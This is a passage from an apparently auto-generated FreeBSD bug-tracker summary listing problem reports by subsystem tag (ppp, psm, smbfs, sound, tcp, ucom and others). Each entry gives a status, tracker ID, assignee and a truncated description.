o kern/99408 [ppp] problems with ppp and arp o kern/93019 net [ppp] ppp and tunX problems: no traffic after restarti o kern/92270 glebius [ppp]: ppp does not work on renamed network interfaces f bin/88619 brian [ppp] ppp chat auth fails ( pppoe ) s kern/84386 [ppp] [request] PPPoA Authentication built into FreeBS o conf/67328 [ppp] Usermode PPP hangs on boot when NIS configured o kern/27474 net [ipf] [ppp] Interactive use of user PPP and ipfilter c 16 problems total. Problem reports for tag 'pppd': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/112160 [pppd] uplink DSL w/pppoe+NAT 'out of buffer space' ki o kern/109308 net [pppd] [panic] Multiple panics kernel ppp suspected [r o kern/109277 [pppd] [patch] : kernel ppp(4) botches clist reservati o kern/102390 [pppd] [patch] kernel pppd don't using pam o kern/99607 [pppd] pppd hangs kernel due to interrupt flood from s o bin/98542 [pppd] pppd(8) daemon unexpectently died , Exit 1 o kern/95288 net [pppd] [tty] [panic] if_ppp panic in sys/kern/tty_subr 7 problems total. Problem reports for tag 'procfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/124487 [procfs] [patch] Extending the PROCFS (/proc) filesyst o kern/97505 [procfs] file entry of procfs points to "unknown" o kern/96999 [procfs] [patch] procfs reports incorrect information s kern/19535 [procfs] [patch] procfs_rlimit tidyup 4 problems total. Problem reports for tag 'pseudofs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/85137 des [pseudofs] [patch] panic due to sleep with held mutex 1 problem total. Problem reports for tag 'psm': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/129125 [psm] psm0: failed to reset the aux device. f kern/128308 gavin [psm] psm0 cause page fault o kern/128083 [psm] [panic] early SMP panic on GA-G31M-S2L motherboa o kern/127887 [psm] PSM0 not detected by the KERNEL in Compaq Prolia o bin/122235 [psm] freebsd-7.0 moused(8) problems with ALPS GlidePo o kern/122046 [psm] Synaptics touchpad freezes (psm0: lost interrupt o kern/119197 [psm]: PS/2 mouse doesn't work under FreeBSD i386 7.0 o kern/109161 philip [psm] synaptic touchpad doesn't work o kern/108659 [psm] Mouse (Synaptics touchpad) cursor freezes for so o kern/100687 [psm] psm problem (?): touchpad hangs, then move supe o kern/91339 [psm] mousedriver do not recognize aditional buttons o s i386/85072 i386 [psm] ps/2 Mouse detection failure on compaq chipset o kern/84411 philip [psm] [patch] psm drivers adds bad buttons for Synapti s kern/80844 vwe [psm] [patch] Increase compatibility of psm driver wit o kern/18293 [psm] [patch] lack of versapad mouse wheel emulation 15 problems total. Problem reports for tag 'pst': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/121454 acpi [pst] Promise SuperTrak SX6000 does not load during bo o i386/74153 i386 [pst] FreeBSD 5.3 cannot boot ftom pst 2 problems total. Problem reports for tag 'ptrace': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/114155 [ptrace] sigsuspend gets interrupted by ptrace 1 problem total. Problem reports for tag 'pty': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/99758 [pty] [patch] chown/chmod pty slave side in kernel o kern/60697 [pty] [patch] pseudo-tty hack versus telnet race cause 2 problems total. Problem reports for tag 'puc': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134878 [puc] [patch] Add support for Oxford OXPCIe954 and OXP o kern/132271 [puc] [patch] puc support for a generic card o kern/124128 [puc] puc driver doesn't support VScom PCIex-800H 8-po p kern/104212 [puc] [patch] support for Kuroutoshikou SERIAL4P-LPPCI o kern/103250 [puc] puc failed to attach sio ports when loaded as mo o kern/82901 [puc] ECP mode fails on NetMos ppc card - "PWord not s o kern/75132 jhb [puc] [patch] add support for the Davicom 56PDV PCI Mo o kern/43716 [puc] [patch] puc driver does not recognize Lava Dual- 8 problems total. Problem reports for tag 'pxeboot': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/123981 i386 [pxeboot] You can't usefully PXEBOOT the 7.0-RELEASE-i o kern/118222 [pxeboot] [patch] FreeBSD 7.0 PXE + NFS / "Can't work o kern/106028 [pxeboot] tftp inside pxeboot isn't initialised proper o kern/91719 [pxeboot] BZ2_bzDecompress returned -3 error on loadin o kern/90368 [pxeboot] pxeboot misses ${class} parameter when booti 5 problems total. Problem reports for tag 'queue': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/119307 emaste [queue] [patch] TRASHIT macro blasts list header if RE 1 problem total. Problem reports for tag 'quotas': S Tracker Resp. Description -------------------------------------------------------------------------------- s bin/42004 mpp [quotas] quota is still IPv4 only, and not INET indepe 1 problem total. Problem reports for tag 'radeon': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/121337 [radeon] [panic] Kernel panic on 7.0-RELEASE using ati o kern/119850 [radeon] radeon module doesnt work right, when loaded o kern/108829 [radeon] radeon module fails with thinkpad T43 s kern/89271 [radeon] [agp] [hang] X.org hangs when heavily using R 4 problems total. Problem reports for tag 'ral': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134591 [ral] ral(4) driver frequently loses carrier (on RT256 o kern/134168 net [ral] ral driver problem on RT2525 2.4GHz transceiver o kern/132238 [ral] ral driver does not support RT2860 o kern/126895 net [patch] [ral] Add antenna selection (marked as TBD) f kern/125502 net [ral] ifconfig ral0 scan produces no output unless in o kern/124341 net [ral] promiscuous mode for wireless device ral0 looses o kern/122033 net [ral] [lor] Lock order reversal in ral0 at bootup [reg o kern/121174 [ral] if_ral loses performance in FreeBSD 7 (RELENG_7) o kern/119696 [irq] [ral] ral device causes massive interrupt storm f kern/117655 sam [ral] ral%d: device timeout when running as an access o kern/111457 net [ral] ral(4) freeze o kern/109227 [ral] ral(4) driver doesn't handle correctly RT2561C P o kern/103200 [ral] ral driver for RELENG_6 is out-of-date with resp o kern/95519 net [ral] ral0 could not map mbuf o kern/91364 net [ral] [wep] WF-511 RT2500 Card PCI and WEP o kern/82456 [ral] WITNESS warning/backtrace in if_ral 16 problems total. Problem reports for tag 'random': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/123177 secteam [random] [patch] arc4rand(9) produces the same sequenc 1 problem total. Problem reports for tag 'rc.d': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/134250 [rc.d] mountlate: bogus error message when using neste o conf/133987 rc [rc.d] defaultroute broken with DHCP in some cases o conf/132476 rc [rc.d] [patch] add support setfib(1) in rc.d/routing o conf/130555 net [rc.d] [patch] No good way to set ipfilter variables a o conf/130381 pf [rc.d] [pf] [ip6] ipv6 not fully configured when pf st o conf/119076 rc [patch] [rc.d] /etc/rc.d/netif tries to remove alias a o conf/109562 rc [rc.d] [patch] [request] Make rc.d/devfs usable from c p conf/103489 bz [rc.d] [named] [jail] [patch] named_chroot_autoupdate 8 problems total. Problem reports for tag 're': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/123563 yongari [re] watchdog timeout o kern/123166 yongari [re] CARP messages filtered by Realtek driver on > 6.2 f amd64/122970 yongari [re] [hang] RealTek 8168/8111B couses system crash f kern/119047 yongari [re] Not correct working RealTek 8168/8111B PCIe Gigab o kern/109251 net [re] [patch] if_re cardbus card won't attach o kern/108485 [re] stress2-udp with realtek 8169S gigabit interface f amd64/106918 yongari [re] Asus P5B with internal RealTek PCIe Ethernet gets o kern/84584 yongari [re] re(4) spends too much time in interrupt handler ( o i386/70832 yongari [re] re0: watchdog timeout on Evo N1015v 9 problems total. Problem reports for tag 'resolver': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/74314 bz [resolver] [jail] DNS resolver broken under certain ja 1 problem total. Problem reports for tag 'rl': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/134517 yongari [rl] [patch] Realtek 8111C Driver Backport for FreeBSD o kern/100290 yongari [rl] rl0: watchdog timeout [regression] o kern/71045 [rl] [vr] DHCP-Request is sets other device's ip to nu 3 problems total. Problem reports for tag 'route': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134931 net [route] [fib] Route messages sent to all socket listen o kern/134531 net [route] [panic] kernel crash related to routes/zebra o kern/134369 net [route] [ip6] IPV6 in Head broken for routing table up 3 problems total. Problem reports for tag 'rp': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/44202 [rp] [patch] -stable rp driver does not work with mult s i386/28975 [rp] RocketPort problems 2 problems total. Problem reports for tag 'rpc': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/117711 matteo [rpc] rpcbind binds to all interfaces on random ports f conf/96412 linimon [rpc] 2 rpc.lockds launched at boot ? blocking problem s bin/94892 [rpc] rpc.lockd does not interoperate with Solaris 10 o bin/94258 [rpc] O_NONBLOCK may block with rpc.lockd o bin/94252 [rpc] rpc.lockd cannot cancel lock requests s kern/56461 [rpc] FreeBSD client rpc.lockd incompatible with Linux 6 problems total. Problem reports for tag 'rpc.quotad': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/93309 [rpc.quotad] [patch] rpc.rquotad: group quota support 1 problem total. Problem reports for tag 'rtalloc': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/127724 net [rtalloc] rtfree: 0xc5a8f870 has 1 refs 1 problem total. Problem reports for tag 'rtc': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/70649 [rtc] system clock slows down when heavily loaded o kern/63431 [rtc] motherboard going to suspend mode stops system c 2 problems total. Problem reports for tag 'rum': S Tracker Resp. Description -------------------------------------------------------------------------------- f usb/128418 usb [panic] [rum] loading if_rum causes panic, looks like o usb/124758 usb [rum] [panic] rum panics SMP kernel o kern/123968 net [rum] [panic] rum driver causes kernel panic with WPA. o kern/120966 net [rum] kernel panic with if_rum and WPA encryption o kern/119945 net [rum] [panic] rum device in hostap mode, cause kernel 5 problems total. Problem reports for tag 'sa': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/128452 scsi [sa] [panic] Accessing SCSI tape drive randomly crashe 1 problem total. Problem reports for tag 'safe': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/110662 sam [safe] safenet driver causes kernel panic 1 problem total. Problem reports for tag 'sbp': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/119572 [sbp] PowerBook not accessable when in target mode 1 problem total. Problem reports for tag 'sched_ule': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/128177 jeff [sched_ule] wrong CPU usage reported by top/ps with SC p kern/120138 jeff [sched_ule] [patch] steal_thresh may be set a wrong va o kern/117420 jeff [sched_ule] round off in sched_balance_pair() s kern/85658 jeff [sched_ule] [patch] add DDB command, show runq, to sch o kern/78444 jeff [sched_ule] doesn't keep track of the sleep time of a 5 problems total. Problem reports for tag 'scheduler': S Tracker Resp. Description -------------------------------------------------------------------------------- o amd64/127451 amd64 [scheduler] incorrect load on quad core 1 problem total. Problem reports for tag 'scsi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/128245 scsi [scsi] "inquiry data fails comparison at DV1 step" [re o kern/78868 gibbs [scsi] Adaptec 29160 fails with IBM LTO-2 drive if dis o kern/13141 se [scsi] Multiple LUN support in NCR driver is broken. s kern/7264 gibbs [scsi] Buslogic BT 950 scsi card not detected 4 problems total. Problem reports for tag 'ses': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/125769 [ses] [panic] getencstat(8) panics system with "Sleepi 1 problem total. Problem reports for tag 'sg': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/120487 scsi [sg] scsi_sg incompatible with scanners o kern/118282 [sg] device sg + hald + umass plugging crashes 7.0 2 problems total. Problem reports for tag 'sio': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/129316 [sio] [panic] kernel panic (pcpu.h:195; support.s:499) o kern/128036 [sio] [patch] serial console mostly ignores typein to a kern/122683 [sio] [freeze] access to non-existent sio port /dev/cu o kern/119606 [sio] [patch] PCMCIA card not attached to driver o i386/112487 i386 [sio] kernel panic on swi0:sio o kern/109743 [sio] The sio(4) driver appears to be getting the seri o kern/109232 imp [sio] [patch] ibufsize calculation wrong causing data o i386/105063 i386 [sio] US Robotics (3Com) 3CP5609 PCI 16550 Modem works o i386/100831 i386 [sio] sio ignores BIOS information about serial ports o kern/97665 [sio] hang in sio driver o kern/51982 remko [sio] sio1: interrupt-level buffer overflows o kern/49039 [sio] [patch] add support for RS485 hardware where dir o kern/44267 [sio] [patch] One more modem PNP id for /usr/src/sys/i o kern/26261 [sio] silo overflow problem in sio driver s kern/2298 [sio] [patch] [request] support for DSR/DCD swapping o 15 problems total. Problem reports for tag 'sis': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/83807 kmacy [sis] [patch] if_sis: Wake On Lan support for FreeBSD o kern/64556 net [sis] if_sis short cable fix problems with NetGear FA3 o kern/35442 net [sis] [patch] Problem transmitting runts in if_sis dri 3 problems total. Problem reports for tag 'sk': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/105375 yongari [sk] 2 x Marvell GBit LAN: device sk0 is attached, but o kern/101274 yongari [sk] [patch] SysKonnect Yukon initialization bug on K8 f kern/96743 yongari [sk] [patch] broken 32-bit register operations 3 problems total. Problem reports for tag 'smb': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/74044 gavin [smb] ServerWorks OSB4 SMBus interface does not detect 1 problem total. Problem reports for tag 'smbd': S Tracker Resp. Description -------------------------------------------------------------------------------- o amd64/125873 amd64 [smbd] [panic] Repeated kernel panics, trap 12 page fa 1 problem total. Problem reports for tag 'smbfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133676 fs [smbfs] [panic] umount -f'ing a vnode-based memory dis o kern/133614 fs [smbfs] [panic] panic: ffs_truncate: read-only filesys o kern/130979 fs [smbfs] [panic] boot/kernel/smbfs.ko o kern/129488 fs [smbfs] Kernel "bug" when using smbfs in smbfs_smb.c: o bin/121072 fs [smbfs] mount_smbfs(8) cannot normally convert the cha o kern/119842 jail [smbfs] [jail] "Bad address" with smbfs inside a jail o bin/117315 fs [smbfs] mount_smbfs(8) and related options can't mount o kern/113852 fs [smbfs] smbfs does not properly implement DFS referral o kern/112658 fs [smbfs] [patch] smbfs and caching problems (resolves b o i386/102617 vwe [smbfs] [editors/ooo] 7 x "smb_maperror: Unmapped erro o kern/101324 fs [smbfs] smbfs sometimes not case sensitive when it's s o kern/94733 fs [smbfs] smbfs may cause double unlock o kern/91134 fs [smbfs] [patch] Preserve access and modification time a kern/90815 fs [smbfs] [patch] SMBFS with character conversions somet o kern/88657 fs [smbfs] windows client hang when browsing a samba shar o kern/88266 fs [smbfs] smbfs does not implement UIO_NOCOPY and sendfi o kern/87859 fs [smbfs] System reboot while umount smbfs. o kern/85326 fs [smbfs] [panic] saving a file via samba to an overquot o kern/80088 fs [smbfs] Incorrect file time setting on NTFS mounted vi o kern/65901 fs [smbfs] [patch] smbfs fails fsx write/truncate-down/tr o kern/61503 fs [smbfs] mount_smbfs does not work as non-root o kern/55617 fs [smbfs] Accessing an nsmb-mounted drive via a smb expo o kern/36566 fs [smbfs] System reboot with dead smb mount and umount 23 problems total. Problem reports for tag 'smbus': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/100513 jhb [smbus] Inconsistent definition of SMBus addresses in 1 problem total. Problem reports for tag 'smp': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/127486 [smp] [panic] early SMP panic ("AP #1 (PHY #1) failed! o kern/123140 [smp] SMP boot causes slow KB, ATA drives not detected f kern/122915 [smp] Incorrect system cpu load o kern/109936 [smp] SMP kernel performance problem on FSC TX600 o kern/93461 [smp] [regression] Intel 440LX SMP freeze (regression o i386/91745 i386 [smp] Second processor not detected on Proliant ML530 o amd64/87305 amd64 [smp] Dual Opteron / FreeBSD 5 & 6 / powerd results in o kern/67830 [smp] [patch] CPU affinity problem with forked child p 8 problems total. Problem reports for tag 'snapshots': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/115645 fs [snapshots] [panic] lockmgr: thread 0xc4c00d80, not ex 1 problem total. Problem reports for tag 'snd_cmi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/114760 multimedia [snd_cmi] snd_cmi driver causing sporadic system hangs 1 problem total. Problem reports for tag 'snd_csa': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/23546 multimedia [snd_csa] [patch] csa DMA-interrupt problem 1 problem total. Problem reports for tag 'snd_emu10k1': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/124319 multimedia [snd_emu10k1] [regression] Cannot record from second c f kern/121962 [snd_emu10k1] [panic] Kernel panics with device pollin o kern/120857 multimedia [snd_emu10k1] snd_emu10k1 driver issues a warning on u o kern/119759 multimedia [snd_emu10k1] Can not record anything with emu10k1 on o kern/107516 multimedia [snd_emu10k1] - skips, clicks and lag after a day of h o kern/104874 multimedia [snd_emu10k1] kldload snd_emu10k1 hangs system 6 problems total. Problem reports for tag 'snd_emu10kx': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132848 multimedia [snd_emu10kx] driver problem with card init, snd_emu10 1 problem total. Problem reports for tag 'snd_hda': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135556 multimedia [snd_hda] Sound (mostly) broken w/ snd_hda on -CURRENT o kern/134767 multimedia [snd_hda] Sigmatel STAC9205X no sound under RELENG_7_2 o kern/132511 multimedia [snd_hda] Probing ALC888 codec on ASRock K10N78-1394 f f kern/132336 multimedia [snd_hda] Realtek ALC888 audio chipset does not work w o kern/120780 multimedia [snd_hda] snd_hda doesn't work on Dell Latitutude D530 o kern/115300 multimedia [snd_hda] snd_hda(4) fails to attach on -CURRENT [regr 6 problems total. Problem reports for tag 'snd_ich': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/100859 multimedia [snd_ich] snd_ich broken on GIGABYTE 915 system o kern/98496 multimedia [snd_ich] some functions don't work in my sound kernel 2 problems total. Problem reports for tag 'snd_maestro': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/119973 multimedia [snd_maestro] snd_maestro only works after reload [reg 1 problem total. Problem reports for tag 'snd_mss': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/97535 multimedia [snd_mss] doesn't work in 6.0-RELEASE and above for Cr s kern/83697 multimedia [snd_mss] [patch] support, docs added for full-duplex, 2 problems total. Problem reports for tag 'snd_neomagic': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/94279 multimedia [snd_neomagic] snd_neomagic crashes on FreeBSD 5.4 and 1 problem total. Problem reports for tag 'socket': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/131876 rwatson [socket] FD leak by receiving SCM_RIGHTS by recvmsg wi o bin/131567 net [socket] [patch] Update for regression/sockets/unix_cm o kern/127360 kmacy [socket] TOE socket options missing from sosetopt() o kern/125258 net [socket] socket's SO_REUSEADDR option does not work o kern/124908 rwatson [socket] kernel performs inadequate check for incorrec a kern/97921 rwatson [socket] close() socket deadlocks blocked threads f kern/96268 net [socket] TCP socket performance drops by 3000% if pack o kern/66268 glebius [socket] [patch] Socket buffer resource limit (RLIMIT_ o kern/21998 kmacy [socket] [patch] ident only for outgoing connections 9 problems total. Problem reports for tag 'sound': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/125756 multimedia [sound] [patch] cannot detect soft-modem on HDA bus o kern/122086 multimedia [sound] maestro sound driver is working, but mixer ini p kern/121156 multimedia [sound] [patch] Turn on inverted external amplifier se o kern/119931 multimedia [sound] No sound card detected on ASUS "K8V-X SE R2.00 o kern/115666 multimedia [sound] Microphone does not work s kern/113950 multimedia [sound] [patch] [request] add per-vchan mixer support o kern/111767 multimedia [sound] ATI SB450 High Definition Audio Controller sou o kern/107051 multimedia [sound] only 2 channels output works for the ALC850 (o o kern/104626 multimedia [sound] FreeBSD 6.2 does not support SoundBlaster Audi o kern/101417 multimedia [sound] 4-speakers output not possible on Asus A8V-Del o kern/98752 multimedia [sound] Intel ich6 82801 FB - on Packard Bell A8810 la o kern/98504 multimedia [sound] Sound is distorted with SB Live 5.1 o kern/98167 multimedia [sound] [es137x] [patch] ES1370 mixer volumes incorrec o kern/97609 multimedia [sound] Load Sound Module - VIA8233 - fails o kern/96538 multimedia [sound] emu10k1-driver inverts channels o kern/95086 multimedia [sound] uaudio line in problem with sbdm lx o kern/93986 multimedia [sound] Acer TravelMate 4652LMi pcm0 channel dead o kern/92512 multimedia [sound] distorted mono output with emu10k1 o kern/90837 [sound] PCM - ICH6 - device is busy, but old process d o kern/87782 multimedia [sound] snd_t4dwave and pcm0:record:0: record interrup o kern/82043 multimedia [sound] snd_emu10k1 - mixer does not work. o kern/81146 multimedia [sound] Sound isn't working AT ALL for Sis7012 onboard o kern/80632 multimedia [sound] pcm driver missing support for CMI8738 auxilla o kern/79912 multimedia [sound] sound broken for 2 VIA chipsets: interrupt sto o kern/79905 multimedia [sound] sis7018 sound module problem o kern/79678 multimedia [sound] sound works except recording from any source o usb/75797 usb [sound] 5.3-STABLE(2005 1/4) detect USB headset, But c f kern/72995 multimedia [sound] Intel ICH2 (82801BA) - sound nearly inaudible o kern/63204 multimedia [sound] /dev/mixer broken with ESS Maestro-2E (still o o kern/60677 multimedia [sound] [patch] No reaction of volume controy key on I o kern/37600 multimedia [sound] [partial patch] t4dwave drive doesn't record. 31 problems total. Problem reports for tag 'stf': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/123858 net [stf] [patch] stf not usable behind a NAT s kern/85444 vwe [stf] IPv6 crash, possibly related to destroying stf i 2 problems total. Problem reports for tag 'svr4': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/91293 delphij [svr4] [patch] *Experimental* Update to the SVR4 emula 1 problem total. Problem reports for tag 'swi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/122989 net [swi] [panic] 6.3 kernel panic in swi1: net s kern/121774 net [swi] [panic] 6.3 kernel panic in swi1: net 2 problems total. Problem reports for tag 'sym': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/114597 scsi [sym] System hangs at SCSI bus reset with dual HBAs o kern/93128 scottl [sym] FreeBSD 6.1 BETA 1 has problems with Symbios/LSI o kern/90282 scsi [sym] SCSI bus resets cause loss of ch device o kern/73289 [sym] Interrupt storm on sym0 o kern/60641 scsi [sym] Sporadic SCSI bus resets with 53C810 under load 5 problems total. Problem reports for tag 'syscons': S Tracker Resp. Description -------------------------------------------------------------------------------- p conf/126841 philip [syscons] [patch] Add eee900 keyboard layout to /usr/s o kern/98788 [syscons] [patch] Add sysctl to disallow VT_LOCKSWITCH s bin/90082 matteo [syscons] [patch] curses ACS line graphics support for o kern/72585 [syscons] [patch] iso05-8x16.fnt lacks letter q o kern/48599 [syscons] [patch] syscons cut-n-paste logic is broken o kern/46973 [syscons] [patch] [request] syscons virtual terminals o kern/39252 [syscons] [patch] syscons doesn't support 8-bit contro o kern/31890 [syscons] [patch] new syscons font s kern/15436 [syscons] syscons extension: "propellers" 9 problems total. Problem reports for tag 'sysctl': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/135550 [sysctl] [request] Feature Request: Manufacturer Infor o kern/134540 [sysctl] [panic] kernel panic after sysctl -a (in strl o kern/134231 [sysctl] sysctl() 80% slower in 7.2 than 6.2 [regressi o bin/123644 [patch] [sysctl] Allow sysctl(8) to ignore unknown OID p bin/121512 mtm [sysctl] [patch] sysctl(8) should return 1 if the user o kern/91023 [sysctl] cpufreq/p4tcc: sysctl: dev.cpu.0.freq: Device o i386/73921 i386 [sysctl] [patch] sysctlbyname for machdep.tsc_freq doe o kern/54439 [sysctl] [patch] Protecting sysctls variables by given o kern/39681 [sysctl] [patch] add hidden kernel boot tunables to sy 9 problems total. Problem reports for tag 'sysvipc': S Tracker Resp. Description -------------------------------------------------------------------------------- o threa/70975 threads [sysvipc] unexpected and unreliable behaviour when usi 1 problem total. Problem reports for tag 'sysvshm': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/115619 [sysvshm] Unfinished (uncompliant?) support for POSIX 1 problem total. Problem reports for tag 'tap': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/123892 net [tap] [patch] No buffer space available o kern/118399 secteam [tap] local/remote kernel DoS through TAP device o kern/117271 net [tap] OpenVPN TAP uses 99% CPU on releng_6 when if_tap 3 problems total. Problem reports for tag 'tcp': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/127928 net [tcp] [patch] TCP bandwidth gets squeezed every time t f kern/123617 net [tcp] breaking connection when client downloading file o kern/123603 net [tcp] tcp_do_segment and Received duplicate SYN f kern/122082 rwatson [tcp] NULL pointer dereference in in_pcbdrop o kern/121257 net [tcp] TSO + natd -> slow outgoing tcp traffic o kern/116335 andre [tcp] Excessive TCP window updates o kern/108670 silby [tcp] TCP connection ETIMEDOUT f kern/102741 andre [tcp] Multiple outbound connect() calls produce 'Netwo p kern/102653 andre [tcp] TCP stack sends infinite retries for connection o kern/99188 andre [tcp] [patch] FIN in same packet as duplicate ACK is l f kern/93378 net [tcp] Slow data transfer in Postfix and Cyrus IMAP (wo o kern/92690 silby [tcp] slowstart_flightsize ignored in 6-STABLE 12 problems total. Problem reports for tag 'termcap': S Tracker Resp. Description -------------------------------------------------------------------------------- o conf/128874 [termcap] termcap entry for rxvt missing :AX: capabili 1 problem total. Problem reports for tag 'terminfo': S Tracker Resp. Description -------------------------------------------------------------------------------- o conf/133715 [terminfo] [patch] no terminfo for rxvt-unicode termin 1 problem total. Problem reports for tag 'threads': S Tracker Resp. Description -------------------------------------------------------------------------------- s threa/39922 threads [threads] [patch] Threaded applications executed with 1 problem total. Problem reports for tag 'ti': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/123147 remko [ti] [patch] ti(4) doesn't use mii, but kernel configs o kern/20529 [ti] gigabit cards fail to link 2 problems total. Problem reports for tag 'timecounters': S Tracker Resp. Description -------------------------------------------------------------------------------- o amd64/127484 amd64 [timecounters] Drift problem with FreeBSD 7.0 and 7.1 1 problem total. Problem reports for tag 'tinybsd': S Tracker Resp. Description -------------------------------------------------------------------------------- p misc/135301 remko [tinybsd] [patch] Patch for fix architecture support f o misc/131059 [tinybsd] [patch] tinybsd MFSROOT option suggests YES/ 2 problems total. Problem reports for tag 'tmpfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132597 fs [tmpfs] [panic] tmpfs-related panic while interrupting o kern/127659 fs [tmpfs] tmpfs memory leak o kern/127213 fs [tmpfs] sendfile on tmpfs data corruption o kern/122038 fs [tmpfs] [panic] tmpfs: panic: tmpfs_alloc_vp: type 0xc 4 problems total. Problem reports for tag 'tools': S Tracker Resp. Description -------------------------------------------------------------------------------- o misc/127550 [tools] [patch] src/tools/tools/editing/freebsd.vim im p misc/115025 edwin [tools] [patch] new flash device for nanobsd's FlashDe o misc/100322 [tools] [patch] kerninclude.sh doesn't dump object nam 3 problems total. Problem reports for tag 'trm': S Tracker Resp. Description -------------------------------------------------------------------------------- o sparc/105048 sparc64 [trm] trm(4) panics on sparc64 1 problem total. Problem reports for tag 'tun': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133902 net [tun] Killing tun0 iface ssh tunnel causes Panic Strin o kern/116837 net [tun] [panic] [patch] ifconfig tunX destroy: panic o kern/116172 bz [tun] [nd6] [panic] Network / ipv6 recursive mutex pan o bin/115951 [tun] pppoed(8): tun not closed after client abruptly 4 problems total. Problem reports for tag 'twa': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/119043 [twa] twa hang after heavy disk IO o kern/107608 [twa] [hang] Raid Problem beim Zugriff auf Raid 2 problems total. Problem reports for tag 'twe': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/72906 [twe] twe0 idefinite wait buffer a kern/66185 [twe] twe driver generates gratuitous warning on shutd 2 problems total. Problem reports for tag 'txp': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/100839 yongari [txp] txp driver inconsistently stops working when the 1 problem total. Problem reports for tag 'uart': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132165 [uart] [lor] LOR slock and uart_hwmtx o kern/131933 [uart] [patch] Cannot detect Sony Ericsson GC89 EDGE/W p kern/129665 rik [uart] Oxford OX16PCI958 8-serial multiport card is no o kern/129663 rik [uart] Timedia-based 8-serial multiport card: only two o kern/106645 [uart] [patch] uart device description in 7-CURRENT is 5 problems total. Problem reports for tag 'uath': S Tracker Resp. Description -------------------------------------------------------------------------------- p usb/135009 weongyo [uath] [patch] Accton ar5523 products not in "uath" dr 1 problem total. Problem reports for tag 'uaudio': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/117598 usb [uaudio] [patch] Not possible to record with Plantroni 1 problem total. Problem reports for tag 'ubsa': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/129522 usb [ubsa] [patch] add support for ZTE AC8700 modem o usb/127543 n_hibma [patch] [ubsa] Support Option Globetrotter HSDPA modem o usb/122956 usb [ubsa] [patch] add support for Novatel Wireless XU870 o usb/122936 usb [ucom] [ubsa] Device does not receive interrupt o usb/122905 usb [ubsa] [patch] add Huawei E220 to ubsa o usb/119227 usb [ubsa] [patch] ubsa buffer is too small; should be tun p usb/118374 attilio [ubsa] [patch] support Option GlobeTrotter Max 3.6 wir 7 problems total. Problem reports for tag 'ubsec': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133143 [ubsec] [panic] Kernel panic with ubsec and cryptodev; 1 problem total. Problem reports for tag 'ucom': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/127248 usb [ucom] panic while uplcom devices attaach and detach o kern/124777 usb [ucom] USB cua devices don't revert to tty devices whe o usb/122936 usb [ucom] [ubsa] Device does not receive interrupt o usb/118141 usb [ucom] usb serial and nokia phones ucomreadcb ucomread o usb/118140 usb [ucom] [patch] quick hack for ucom to get it behave wi o usb/113432 usb [ucom] WARNING: attempt to net_add_domain(netgraph) af o kern/86763 [ucom] kernel: ucom0: ucomwritecb: IOERROR o usb/83977 usb [ucom] [panic] ucom1: open bulk out error (addr 2): IN o usb/82350 usb [ucom] [panic] null pointer dereference in USB stack o 